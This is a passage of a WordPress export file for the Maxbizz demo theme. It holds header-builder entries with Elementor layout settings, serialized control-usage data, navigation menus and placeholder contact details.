0.19)","hover_color":"#FFFFFF","button_background_hover_color":"#FF8F3E","border_border":"solid","border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"border_color":"#FF8F3E","border_radius":{"unit":"px","top":"3","right":"3","bottom":"3","left":"3","isLinked":true},"text_padding":{"unit":"px","top":"16","right":"29","bottom":"16","left":"29","isLinked":false},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"58","isLinked":false},"typography_font_size":{"unit":"px","size":13,"sizes":[]}},"elements":[],"widgetType":"button"}],"isInner":false}],"isInner":false},{"id":"a79077e","elType":"section","settings":{"structure":"22","background_background":"classic","background_color":"#272933","box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":15,"vertical":15,"blur":38,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"sticky_class":"is-fixed"},"elements":[{"id":"3c16631","elType":"column","settings":{"_column_size":66,"_inline_size":null},"elements":[{"id":"471e1f7","elType":"widget","settings":{"nav_menu":"main-menu","text_color":"#FFFFFF","text_hover_color":"#FE8423","smenu_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":10,"spread":0,"color":""}},"elements":[],"widgetType":"imenu"}],"isInner":false},{"id":"c60b06b","elType":"column","settings":{"_column_size":33,"_inline_size":null,"align":"flex-end","_ot_content_align":"horizontal"},"elements":[{"id":"1ca8a66","elType":"widget","settings":{"icon_color":"#FFFFFF"},"elements":[],"widgetType":"icart"},{"id":"a1e6544","elType":"widget","settings":{"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"20","isLinked":false},"icon_color":"#FFFFFF"},"elements":[],"widgetType":"isearch"},{"id":"f2c8f30","elType":"widget","settings":{"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"30","isLinked":false},"icon_color":"#FFFFFF"},"elements":[],"widgetType":"isidepanel"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"logo_image";i:1;s:10:"logo_width";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:4;s:17:"_ot_content_align";i:2;s:5:"align";i:2;}}}}s:8:"icon-box";a:3:{s:5:"count";i:2;s:15:"control_percent";i:9;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:2;s:16:"description_text";i:2;s:8:"position";i:2;s:10:"title_size";i:2;s:13:"selected_icon";i:2;s:4:"link";i:1;}}s:5:"style";a:2:{s:18:"section_style_icon";a:3:{s:13:"primary_color";i:2;s:9:"icon_size";i:2;s:6:"rotate";i:2;}s:21:"section_style_content";a:13:{s:26:"content_vertical_alignment";i:2;s:18:"title_bottom_space";i:2;s:27:"title_typography_typography";i:2;s:26:"title_typography_font_size";i:2;s:28:"title_typography_font_weight";i:2;s:33:"description_typography_typography";i:2;s:32:"description_typography_font_size";i:2;s:34:"description_typography_font_weight";i:2;s:11:"title_color";i:2;s:28:"title_typography_font_family";i:2;s:17:"description_color";i:2;s:34:"description_typography_font_family";i:2;s:28:"title_typography_line_height";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:2;}}}}s:6:"button";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_button";a:1:{s:4:"text";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:12:{s:21:"typography_typography";i:1;s:22:"typography_font_weight";i:1;s:17:"button_text_color";i:1;s:16:"background_color";i:1;s:11:"hover_color";i:1;s:29:"button_background_hover_color";i:1;s:13:"border_border";i:1;s:12:"border_width";i:1;s:12:"border_color";i:1;s:13:"border_radius";i:1;s:12:"text_padding";i:1;s:20:"typography_font_size";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:6:"layout";a:3:{s:14:"section_layout";a:1:{s:16:"content_position";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:2;}s:19:"header_custom_class";a:1:{s:12:"sticky_class";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:7:"padding";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:2:{s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}}}s:5:"imenu";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:2:{s:18:"style_menu_section";a:2:{s:10:"text_color";i:1;s:16:"text_hover_color";i:1;}s:19:"style_smenu_section";a:1:{s:23:"smenu_shadow_box_shadow";i:1;}}}}s:5:"icart";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:10:"icon_color";i:1;}}}}s:7:"isearch";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:10:"icon_color";i:1;}}}}s:10:"isidepanel";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:10:"icon_color";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Header Mobile - Logo Left</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/ot_header_builders/header-mobile/</link>
		<pubDate>Fri, 22 May 2020 10:22:39 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/?post_type=ot_header_builders&#038;p=77</guid>
		<description></description>
		<content:encoded><![CDATA[<a href="http://wpdemo.archiwp.com/maxbizz-corporate/">
					<img src="https://maxbizz.s3.amazonaws.com/images/04_White.svg" alt="Maxbizz Corporate">
				</a>			        
				<!-- Form Search on Header -->
						<form role="search" method="get" action="http://wpdemo.archiwp.com/maxbizz-corporate/" >
    <label>Search for:
    <input type="search" placeholder="Search&hellip;" value="" name="s" /></label>
	<button type="submit"></button>
    </form>														
					<button></button>
						<a href="#"></a>
							<ul id="menu-main-menu"><li id="menu-item-1703"><a href="http://wpdemo.archiwp.com/maxbizz-consulting">Home</a></li>
<li id="menu-item-1704"><a href="#">Pages</a>
<ul>
	<li id="menu-item-1748"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/about-us/">About Us</a></li>
	<li id="menu-item-1770"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/our-services/">Our Services 1</a></li>
	<li id="menu-item-1765"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/services-with-icon/">Our Services 2</a></li>
	<li id="menu-item-1754"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/our-core-values/">Our Core Values</a></li>
	<li id="menu-item-1755"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/our-team/">Our Team</a></li>
	<li id="menu-item-1756"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/our-team/single-team/">Single Team</a></li>
	<li id="menu-item-1752"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/elements/">Elements</a></li>
	<li id="menu-item-1757"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/typography/">Typography</a></li>
	<li id="menu-item-1753"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/faqs/">FAQs</a></li>
	<li id="menu-item-1749"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/404-2/">404</a></li>
	<li id="menu-item-1750"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/coming-soon/">Coming Soon</a></li>
</ul>
</li>
<li id="menu-item-1768"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-grid/">Portfolio</a>
<ul>
	<li id="menu-item-1771"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-grid/">Portfolio Grid</a></li>
	<li id="menu-item-1769"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-masonry/">Portfolio Masonry</a></li>
	<li id="menu-item-1767"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-carousel/">Portfolio Carousel</a></li>
	<li id="menu-item-1774"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/digital-marketing/">Portfolio Details</a></li>
</ul>
</li>
<li id="menu-item-1766"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/our-services/">Services</a>
<ul>
	<li id="menu-item-1764"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/our-services/marketing-research/">Marketing Research</a></li>
	<li id="menu-item-1763"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/our-services/organizational-audit/">Organizational Audit</a></li>
	<li id="menu-item-1762"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/our-services/business-consulting/">Business Consulting</a></li>
	<li id="menu-item-1761"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/our-services/project-management/">Project Management</a></li>
	<li id="menu-item-1760"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/our-services/support-function/">Support Function</a></li>
	<li id="menu-item-1759"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/our-services/finance-planning/">Finance Planning</a></li>
</ul>
</li>
<li id="menu-item-1758"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/blog/">Blog</a>
<ul>
	<li id="menu-item-1772"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/blog/">Blog List</a></li>
	<li id="menu-item-1773"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/2020/02/24/the-future-of-retail-asias-ecosystems/">Blog Post</a></li>
</ul>
</li>
<li id="menu-item-1751"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/contacts/">Contacts</a></li>
</ul>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>77</wp:post_id>
		<wp:post_date><![CDATA[2020-05-22 10:22:39]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-05-22 10:22:39]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[header-mobile]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_header_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"e7c1045","elType":"section","settings":{"structure":"20","box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":15,"vertical":15,"blur":38,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"background_background":"classic","background_color":"#282828"},"elements":[{"id":"026b8ab","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_mobile":40},"elements":[{"id":"447392a","elType":"widget","settings":{"logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/04_White.svg","id":2102},"_padding":{"unit":"px","top":"22","right":"0","bottom":"22","left":"0","isLinked":false},"logo_width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"ilogo"}],"isInner":false},{"id":"172f4fe","elType":"column","settings":{"_column_size":50,"_inline_size":null,"align":"flex-end","_ot_content_align":"horizontal","_inline_size_mobile":60},"elements":[{"id":"0514b95","elType":"widget","settings":{"icon_color":"#FFFFFF","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"22","isLinked":false},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"22","isLinked":false}},"elements":[],"widgetType":"isearch"},{"id":"f14cf6b","elType":"widget","settings":{"nav_menu":"main-menu","icon_color":"#FFFFFF","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"22","isLinked":false},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"22","isLinked":false}},"elements":[],"widgetType":"imenu_mobile"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-07-22]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"logo_image";i:1;s:10:"logo_width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:4:{s:12:"_inline_size";i:2;s:19:"_inline_size_mobile";i:2;s:5:"align";i:1;s:17:"_ot_content_align";i:1;}}}}s:7:"isearch";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:10:"icon_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:1;s:8:"_padding";i:1;}}}}s:12:"imenu_mobile";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:10:"icon_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:1;s:8:"_padding";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:6:"layout";a:1:{s:17:"section_structure";a:1:{s:9:"structure";i:1;}}s:5:"style";a:2:{s:14:"section_border";a:2:{s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Header 2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/ot_header_builders/header-2/</link>
		<pubDate>Thu, 23 Jul 2020 03:53:00 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/?post_type=ot_header_builders&#038;p=106</guid>
		<description></description>
		<content:encoded><![CDATA[<a href="#" target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Instagram
											</a>
					<ul>
							<li>
													
										Mon - Sat: 8.00 - 18.00
									</li>
								<li>
							

	
		
	

						
										411 University St, Seattle
									</li>
								<li>
					<a href="tel:+1-800-456-478-23">						
							

	
		
	

						
										+1-800-456-478-23
											</a>
									</li>
						</ul>
				<a href="http://wpdemo.archiwp.com/maxbizz-consulting/">
					<img src="https://maxbizz.s3.amazonaws.com/images/02_Black.svg" alt="Maxbizz Consulting">
				</a>			        
						<nav id="site-navigation">			
				<ul id="primary-menu"><li id="menu-item-1291"><a href="http://wpdemo.archiwp.com/maxbizz-consulting">Home</a></li>
<li id="menu-item-1292"><a href="#">Pages</a>
<ul>
	<li id="menu-item-1320"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/about-us/">About Us</a></li>
	<li id="menu-item-1342"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/">Our Services 1</a></li>
	<li id="menu-item-1337"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/services-with-icon/">Our Services 2</a></li>
	<li id="menu-item-1326"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-core-values/">Our Core Values</a></li>
	<li id="menu-item-1327"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-team/">Our Team</a></li>
	<li id="menu-item-1328"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-team/single-team/">Single Team</a></li>
	<li id="menu-item-1324"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/elements/">Elements</a></li>
	<li id="menu-item-1329"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/typography/">Typography</a></li>
	<li id="menu-item-1325"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/faqs/">FAQs</a></li>
	<li id="menu-item-1321"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/404-2/">404</a></li>
	<li id="menu-item-1322"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/coming-soon/">Coming Soon</a></li>
</ul>
</li>
<li id="menu-item-1340"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-grid/">Portfolio</a>
<ul>
	<li id="menu-item-1343"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-grid/">Portfolio Grid</a></li>
	<li id="menu-item-1341"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-masonry/">Portfolio Masonry</a></li>
	<li id="menu-item-1339"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-carousel/">Portfolio Carousel</a></li>
	<li id="menu-item-1346"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/digital-marketing/">Portfolio Details</a></li>
</ul>
</li>
<li id="menu-item-1338"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/">Services</a>
<ul>
	<li id="menu-item-1336"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/marketing-research/">Marketing Research</a></li>
	<li id="menu-item-1335"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/organizational-audit/">Organizational Audit</a></li>
	<li id="menu-item-1334"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/business-consulting/">Business Consulting</a></li>
	<li id="menu-item-1333"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/project-management/">Project Management</a></li>
	<li id="menu-item-1332"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/support-function/">Support Function</a></li>
	<li id="menu-item-1331"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/finance-planning/">Finance Planning</a></li>
</ul>
</li>
<li id="menu-item-1330"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/blog/">Blog</a>
<ul>
	<li id="menu-item-1344"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/blog/">Blog List</a></li>
	<li id="menu-item-1345"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/2020/02/24/the-future-of-retail-asias-ecosystems/">Blog Post</a></li>
</ul>
</li>
<li id="menu-item-1323"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/contacts/">Contacts</a></li>
</ul>			</nav>
				<!-- Form Search on Header -->
						
    <label>Search for:
    </label>
	<button type="submit"></button>
    														
			<a href="http://wpdemo.archiwp.com/maxbizz/contacts">free quote</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>106</wp:post_id>
		<wp:post_date><![CDATA[2020-07-23 03:53:00]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-07-23 03:53:00]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[header-2]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_header_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.11]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"cc784fd","elType":"section","settings":{"layout":"full_width","content_position":"middle","structure":"21","background_background":"classic","background_color":"#262832","margin":{"unit":"px","top":"","right":0,"bottom":"","left":0,"isLinked":true},"padding":{"unit":"px","top":"0","right":"40","bottom":"0","left":"40","isLinked":false}},"elements":[{"id":"1d738b2","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"32895ca","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"0d77827","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(255, 255, 255, 0)"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"04b0949","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(2, 1, 1, 0)"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"d468e5b","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(2, 1, 1, 0)"},{"social_icon":{"value":"fab fa-instagram","library":"fa-brands"},"link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(2, 1, 1, 0)","item_icon_secondary_color":"#FFFFFF","_id":"e7140d6"}],"shape":"circle","align":"left","icon_size":{"unit":"px","size":12,"sizes":[]},"icon_padding":{"unit":"em","size":0.5,"sizes":[]},"icon_spacing":{"unit":"px","size":8,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0.3)","_padding":{"unit":"px","top":"7","right":"0","bottom":"7","left":"0","isLinked":false},"icon_color":"custom","hover_primary_color":"#18A6F0","hover_border_color":"#18A6F0","columns":"4"},"elements":[],"widgetType":"social-icons"}],"isInner":false},{"id":"78dcf95","elType":"column","settings":{"_column_size":66,"_inline_size":null},"elements":[{"id":"c94f846","elType":"widget","settings":{"view":"inline","icon_list":[{"text":"Mon - Sat: 8.00 - 18.00","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/symbol.svg","id":356},"library":"svg"},"_id":"e6e2d89"},{"text":"411 University St, Seattle","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"_id":"6e383c8"},{"text":"+1-800-456-478-23","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"_id":"25c4675","link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""}}],"space_between":{"unit":"px","size":45,"sizes":[]},"icon_align":"right","icon_color":"#4B83FC","text_color":"#FFFFFF","text_indent":{"unit":"px","size":7,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_family":"Inter","icon_typography_font_size":{"unit":"px","size":13,"sizes":[]},"icon_typography_line_height":{"unit":"em","size":1,"sizes":[]},"icon_size":{"unit":"px","size":15,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"8","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-list"}],"isInner":false}],"isInner":false},{"id":"37d086b","elType":"section","settings":{"layout":"full_width","structure":"33","box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":15,"vertical":15,"blur":38,"spread":0,"color":"rgba(0, 0, 0, 0.09)"},"padding":{"unit":"px","top":"0","right":"40","bottom":"0","left":"40","isLinked":false},"sticky_class":"is-fixed","sticky_background":"#FFFFFF"},"elements":[{"id":"d44a756","elType":"column","settings":{"_column_size":25,"_inline_size":18.047000000000000596855898038484156131744384765625},"elements":[{"id":"76a2789","elType":"widget","settings":{"logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/02_Black.svg","id":350},"_padding":{"unit":"px","top":"26","right":"0","bottom":"28","left":"0","isLinked":false},"logo_width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"ilogo"}],"isInner":false},{"id":"a71a42c","elType":"column","settings":{"_column_size":50,"_inline_size":63.90599999999999880628820392303168773651123046875,"content_position":"center","align":"center","_ot_content_align":"horizontal","margin":{"unit":"%","top":"","right":"","bottom":"","left":"","isLinked":true}},"elements":[{"id":"a6322eb","elType":"widget","settings":{"nav_menu":"main-menu","space_item":{"unit":"px","size":29,"sizes":[]},"text_hover_color":"#4B82FB","_margin":{"unit":"%","top":"","right":"","bottom":"","left":"","isLinked":true},"menu_typography_typography":"custom","menu_typography_font_size":{"unit":"px","size":14,"sizes":[]},"menu_typography_font_weight":"700","smenu_typography_typography":"custom"},"elements":[],"widgetType":"imenu"}],"isInner":false},{"id":"990f116","elType":"column","settings":{"_column_size":25,"_inline_size":18.0270000000000010231815394945442676544189453125,"align":"flex-end","_ot_content_align":"horizontal","_ot_column_min_width":{"unit":"px","size":260,"sizes":[]},"content_position":"center"},"elements":[{"id":"3ea33c9","elType":"widget","settings":{"bg_btn":"#4B83FC","_margin":{"unit":"px","top":"0","right":"40","bottom":"0","left":"20","isLinked":false}},"elements":[],"widgetType":"isearch"},{"id":"f41aa01","elType":"widget","settings":{"text":"free quote","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/contacts","is_external":"","nofollow":"","custom_attributes":""},"btn_bg":"#4A81F9"},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:8:{s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:4:{s:16:"social_icon_list";i:1;s:5:"shape";i:1;s:5:"align";i:1;s:7:"columns";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:7:{s:9:"icon_size";i:1;s:12:"icon_padding";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:10:"icon_color";i:1;}s:20:"section_social_hover";a:2:{s:19:"hover_primary_color";i:1;s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:5;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:5:{s:12:"_inline_size";i:5;s:16:"content_position";i:2;s:5:"align";i:2;s:17:"_ot_content_align";i:2;s:20:"_ot_column_min_width";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:6:"margin";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:2:{s:4:"view";i:1;s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:2:{s:13:"space_between";i:1;s:10:"icon_align";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:6:{s:10:"text_color";i:1;s:11:"text_indent";i:1;s:26:"icon_typography_typography";i:1;s:27:"icon_typography_font_family";i:1;s:25:"icon_typography_font_size";i:1;s